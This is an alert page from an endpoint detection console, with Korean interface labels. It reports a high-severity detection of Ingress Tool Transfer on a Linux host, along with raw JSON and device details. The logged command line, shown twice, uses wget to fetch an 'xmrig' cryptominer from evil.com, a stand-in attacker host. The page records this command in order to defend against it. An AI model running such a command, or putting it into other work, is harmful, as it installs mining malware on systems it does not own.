Alert Details - DeFender X

Alert Information High

Alert ID: ind:f04562e41eb24f95911339a2dfa4d617:1766236055429923525-30126-3921424
Composite ID: 84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766236055429923525-30126-3921424
설명: An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.
호스트: inbridge-40
상태: new
생성 시간: 2025-12-20 22:08:37
업데이트 시간: 2025-12-20 23:07:37

MITRE ATT&CK

Tactic: Command and Control
Technique: Ingress Tool Transfer

Command Line

wget -q http://evil.com/xmrig -O /tmp/xmrig

Raw JSON Data

{"id":"ind:f04562e41eb24f95911339a2dfa4d617:1766236055429923525-30126-3921424","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766236055429923525-30126-3921424","agent_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"An attempt to download malicious files from the command-line interface has been detected on your host. Adversaries might use curl or wget to download additional payloads in case of compromise. Please review the event to determine if malicious files were downloaded or if this access was expected.","severity":70,"severity_name":"High","confidence":80,"tactic":"Command and Control","tactic_id":"TA0011","technique":"Ingress Tool Transfer","technique_id":"T1105","cmdline":"wget -q http://evil.com/xmrig -O /tmp/xmrig","filename":"wget","filepath":"/usr/bin/wget","sha256":"b8f8a975cf3e7908e076de79814aa448c6086aacfc08165be04ce65665e08e39","status":"new","type":"ldt","created_timestamp":"2025-12-20T13:08:37.339047945Z","updated_timestamp":"2025-12-20T14:07:37.373944849Z","device":{"device_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"inbridge-40","local_ip":"10.24.11.214","external_ip":"211.198.135.5","mac_address":"00-0c-29-31-3f-de","platform_name":"Linux","os_version":"Ubuntu 24.04"},"aggregate_id":"aggind:f04562e41eb24f95911339a2dfa4d617:12929419910","CreatedAt":"2025-12-20T22:08:37.3390479+09:00","UpdatedAt":"2025-12-20T23:07:37.3739448+09:00"}

Quick Info

Severity High
Score 70
Agent ID f04562e41eb24f95911339a2dfa4d617

Actions

Falcon Console에서 보기 목록으로 돌아가기